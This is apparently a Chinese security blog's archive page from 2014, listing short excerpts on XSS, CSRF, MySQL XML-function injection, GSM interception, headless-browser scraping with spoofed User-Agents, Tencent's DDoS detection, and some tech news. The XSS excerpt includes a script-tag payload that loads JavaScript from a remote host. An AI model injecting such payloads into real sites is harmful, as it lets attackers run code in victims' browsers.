admin的文章

12年前 (2014-03-10) 2295浏览 0评论

1、黑客防线  电子版 下载地址：http://www.hacker.com.cn/list-7-1.html 2、抓包工具Wsockexpert 3、C段、旁注查询工具  K8_C段旁注查询工具V1.0.rar   介绍：http://jingli...

12年前 (2014-03-10) 2700浏览 0评论

有些网站的WebServer对User-Agent有限制，可能会拒绝不熟悉的User-Agent的访问，所以，写Web自动化代码可能需要将 User-Agent稍微伪装一下，否则可能会被拒绝访问。这里简单记录一下Selenium中使用PhantomJ...

12年前 (2014-03-10) 4926浏览 2评论

数据抓取的艺术（一）：Selenium+Phantomjs数据抓取环境配置 数据抓取是一门艺术，和其他 软件不同，世界上不存在完美的、一致的、通用的抓取工具。为了不同的目的，需要定制不同的代码。不过，我们不必Start from Scratch，已经...

12年前 (2014-03-10) 2724浏览 0评论

PhantomJS is a headless Webkit, which has a number of uses. In this example, we will be using it, in conjunction with Seleniu...

12年前 (2014-03-10) 2029浏览 0评论

1. phantomjs介绍 基于Javascript驱动的命令行webkit引擎，轻量级，安装简单，开发快速，渲染速度较快，无界面的webkit浏览器。 phontomjs跟一般浏览器一样可以加载网页，但不同的是它不会把网页显示出来，在加载网页后...

12年前 (2014-03-10) 2417浏览 0评论

1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (2)IMG标签XSS使用JavaScript命令 &...

12年前 (2014-03-10) 1554浏览 0评论

摘要 : 当一个行业巨头体量超1000亿美金时，单一领域不能满足其进一步发展，必然促使巨头向多领域发展。在中国阿里和腾讯被公然为是两个千亿美元市值公司。 腾讯控股今日发布公告宣布， 与京东建立战略合作伙伴关系，在此交易中，京东将收购腾讯B2C平...

12年前 (2014-03-10) 2212浏览 0评论

0x00 简要介绍 CSRF（Cross-site request forgery）跨站请求伪造，由于目标站无token/referer限制，导致攻击者可以用户的身份完成操作达到各种目的。根据HTTP请求方式，CSRF利用方式可分为两种。 &nb...

12年前 (2014-03-09) 1890浏览 0评论

最近GSM的话题又被炒了起来，顺便带火了我去年的一篇文章，都是几年前的东西了，重提也没什么意思。因为一直觉得这个话题很敏感，所以也不喜欢说啥，但是最近有人已经在乌云发了，但是有些地方语焉不详。反正都已经公开了，那么我就说细点了。更讨厌的是某些组织长期...

12年前 (2014-03-09) 4302浏览 0评论

HTML5 是下一代的 HTML，HTML5赋予网页更好的意义和结构。更加丰富的标签将随着对RDFa的，微数据与微格式等方面的支持，构建对程序、对用户都更有价值的数据驱动的Web。基于HTML5开发的网页APP拥有更短的启动时间，更快的联网速度。...

12年前 (2014-03-09) 2265浏览 0评论

  CSRF 背景与介绍 CSRF（Cross Site Request Forgery, 跨站域请求伪造）是一种网络的攻击方式，它在 2007 年曾被列为互联网 20 大安全隐患之一。其他安全隐患，比如 SQL 脚本注入，跨站域脚本攻击等...

12年前 (2014-03-09) 2618浏览 0评论

大家都知道通常用csrf来上传一个文件不是很简单的.问题在于我们创建的假的表单提交的数据跟浏览器文件上传提交的数据有一点不同.那就是上传的请求会有一个filename的参数: -----------------------------25667262...

12年前 (2014-03-09) 2338浏览 0评论

0×00 背景 提起浏览器的同源策略，大家都很熟悉。不同域的客户端脚本不能读写对方的资源。但是实践中有一些场景需要跨域的读写，所以出现了一些hack的方式来跨域。比如在同域内做一个代理，JSON-P等。但这些方式都存在缺陷，无法完美的实现跨域读写。所...

12年前 (2014-03-09) 1700浏览 0评论

0x00 前言 很多时候我们会因为一个活动或者一些其它的原因建立一些临时的站点。但是糟糕的是一旦这一切过去后我们会忘了关闭它。就像我在http://hk.promotions.yahoo.com上发现的这个漏洞一样，那些临时站点往往成为我们强大安全...

12年前 (2014-03-09) 4308浏览 0评论

mysql 5.1以后提供了内置的XML文件解析和函数，所以这种注入只能用于5.1版本以后 主要涉及两个函数：ExtractValue()和UpdateXML() 首先看这两个函数的使用示例： 先建立一个带XML格式的示例数据库 CREATE TA...

12年前 (2014-03-09) 1535浏览 0评论

摘要 : 这两天微信POS机开始浮出水面，但真相完全还未触及底层，找到一位真正在做微信POS机的深喉，来完整解密微信POS机是怎么回事。 文/国仁(微信:hawkren 公众号:newhard) 这两天微信POS机开始浮出水面，但真相完全还未触及...

12年前 (2014-03-09) 1454浏览 0评论

摘要 : 糯米狙击阿里O2O 百度钱包杀入移动支付 【听杨姐说】​一直在争夺O2O市场的阿里和腾讯似乎已经忘了还有一个强大的对手——百度。​ 尽管糯米在人人网的手里并没有能够被SNS所带动，但看起来百度对于目前的阿里和腾讯的楚汉争霸非常不爽，他决心要...

12年前 (2014-03-09) 1502浏览 0评论

博文作者：XX 发布日期：2014-01-15 阅读次数：2271 博文内容： 引言 大眼系统是腾讯安全平台部从2008年起自主研发DDoS攻击发现系统，经过5年多的发展，已经发展成集DDoS攻击发现，入侵行为发现，基础数据分析于一身的网络流量分析系...

12年前 (2014-03-09) 1646浏览 0评论

腾讯安全零距离之大眼——大型网络流量分析系统   博文作者：BigHy 发布日期：2013-12-06 阅读次数：5495 博文内容：     引言      对 于服务海量用户的互联网公司的安全从业者而言，能够打造出一...

12年前 (2014-03-09) 1984浏览 0评论

使用HTTPS加密连接访问网站可以防止监听。监听者顶多能知道你访问的网站IP地址，而不知道具体访问了哪个网页。但现在安全研究人员发表了一篇学术论文《I Know Why You Went to the Clinic: Risks and Realiz...